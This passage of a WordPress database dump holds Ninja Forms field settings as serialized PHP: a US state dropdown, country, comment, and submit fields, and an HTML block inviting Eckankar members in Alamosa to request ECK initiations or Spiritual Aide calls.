Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(1236,36,'key','listselect_218','key','listselect_218'),(1237,36,'parent_id','4','parent_id','4'),(1238,37,'type','listcountry','type','listcountry'),(1239,37,'order','9','order','9'),(1240,37,'fav_id','','fav_id',''),(1241,37,'def_id','13','def_id','13'),(1242,37,'label','Country','label','Country'),(1243,37,'label_pos','above','label_pos','above'),(1244,37,'default_value','US','default_value','US'),(1245,37,'user_info_field_group','1','user_info_field_group','1'),(1246,37,'show_help','0','show_help','0'),(1247,37,'help_text','','help_text',''),(1248,37,'calc_auto_include','0','calc_auto_include','0'),(1249,37,'calc_option','0','calc_option','0'),(1250,37,'country_use_custom_first','1','country_use_custom_first','1'),(1251,37,'country_custom_first','Colorado','country_custom_first','Colorado'),(1252,37,'num_sort','0','num_sort','0'),(1253,37,'admin_label','','admin_label',''),(1254,37,'user_info_field_group_name','','user_info_field_group_name',''),(1255,37,'user_info_field_group_custom','','user_info_field_group_custom',''),(1256,37,'show_desc','0','show_desc','0'),(1257,37,'desc_pos','none','desc_pos','none'),(1258,37,'desc_text','','desc_text',''),(1259,37,'element_class','','element_class',''),(1260,37,'required','0','required','0'),(1261,37,'default','US','default','US'),(1262,37,'options','a:0:{}','options','a:0:{}'),(1263,37,'key','listcountry_219','key','listcountry_219'),(1264,37,'parent_id','4','parent_id','4'),(1265,38,'type','hr','type','hr'),(1266,38,'order','10','order','10'),(1267,38,'fav_id','','fav_id',''),(1268,38,'def_id','','def_id',''),(1269,38,'label','hr','label','hr'),(1270,38,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1271,38,'show_desc','0','show_desc','0'),(1272,38,'desc_pos','none','desc_pos','none'),(1273,38,'desc_text','','desc_text',''),(1274,38,'element_class','','element_class',''),(1275,38,'key','hr_207','key','hr_207'),(1276,38,'parent_id','4','parent_id','4'),(1277,39,'type','textarea','type','textarea'),(1278,39,'order','11','order','11'),(1279,39,'fav_id','','fav_id',''),(1280,39,'def_id','','def_id',''),(1281,39,'label','If You Have Comments To Add - Please Enter Them Here','label','If You Have Comments To Add - Please Enter Them Here'),(1282,39,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1283,39,'label_pos','above','label_pos','above'),(1284,39,'default_value','','default_value',''),(1285,39,'textarea_rte','0','textarea_rte','0'),(1286,39,'textarea_media','0','textarea_media','0'),(1287,39,'disable_rte_mobile','0','disable_rte_mobile','0'),(1288,39,'input_limit','','input_limit',''),(1289,39,'input_limit_type','char','input_limit_type','char'),(1290,39,'calc_auto_include','0','calc_auto_include','0'),(1291,39,'num_sort','0','num_sort','0'),(1292,39,'admin_label','','admin_label',''),(1293,39,'show_help','0','show_help','0'),(1294,39,'help_text','','help_text',''),(1295,39,'show_desc','0','show_desc','0'),(1296,39,'desc_pos','none','desc_pos','none'),(1297,39,'desc_text','','desc_text',''),(1298,39,'element_class','','element_class',''),(1299,39,'required','0','required','0'),(1300,39,'default','','default',''),(1301,39,'key','textarea_210','key','textarea_210'),(1302,39,'parent_id','4','parent_id','4'),(17615,636,'order','9','order','9'),(17616,636,'idAttribute','id','idAttribute','id'),(17613,635,'drawerDisabled','','drawerDisabled',''),(17614,636,'editActive','','editActive',''),(17612,635,'key','html_1663800642906','key','html_1663800642906'),(17610,635,'container_class','','container_class',''),(17611,635,'element_class','','element_class',''),(1316,41,'type','submit','type','submit'),(1317,41,'order','13','order','13'),(1318,41,'fav_id','','fav_id',''),(1319,41,'def_id','','def_id',''),(1320,41,'label','Submit','label','Submit'),(1321,41,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1322,41,'show_help','0','show_help','0'),(1323,41,'help_text','','help_text',''),(1324,41,'show_desc','0','show_desc','0'),(1325,41,'desc_pos','none','desc_pos','none'),(1326,41,'desc_text','','desc_text',''),(1327,41,'processing_label','Processing','processing_label','Processing'),(1328,41,'element_class','','element_class',''),(1329,41,'key','submit_212','key','submit_212'),(1330,41,'parent_id','4','parent_id','4'),(1331,42,'objectType','Field','objectType','Field'),(1332,42,'objectDomain','fields','objectDomain','fields'),(1333,42,'editActive','','editActive',''),(1334,42,'order','1','order','1'),(1335,42,'type','html','type','html'),(1336,42,'label','Text','label','Text'),(1337,42,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1338,42,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Alamosa Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Alamosa Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(1339,42,'desc_el','div','desc_el','div'),(1340,42,'show_desc','0','show_desc','0'),(1341,42,'desc_pos','none','desc_pos','none'),(1342,42,'desc_text','','desc_text',''),(1343,42,'element_class','','element_class',''),(1344,42,'default','<p><p></p>\n<h3><span style=\"color: #23507d;\"><strong>Alamosa Initiators and ESA\'s</strong></span></h3>\n\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p><p></p>\n<h3><span style=\"color: #23507d;\"><strong>Alamosa Initiators and ESA\'s</strong></span></h3>\n\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(1345,42,'key','html_80','key','html_80'),(1346,42,'container_class','','container_class',''),(1347,42,'drawerDisabled','','drawerDisabled',''),(1348,42,'parent_id','5','parent_id','5'),(1349,43,'objectType','Field','objectType','Field'),(1350,43,'objectDomain','fields','objectDomain','fields'),(1351,43,'editActive','','editActive',''),(1352,43,'order','2','order','2'),(1353,43,'type','textbox','type','textbox'),(1354,43,'def_id','6','def_id','6'),(1355,43,'label','First Name','label','First 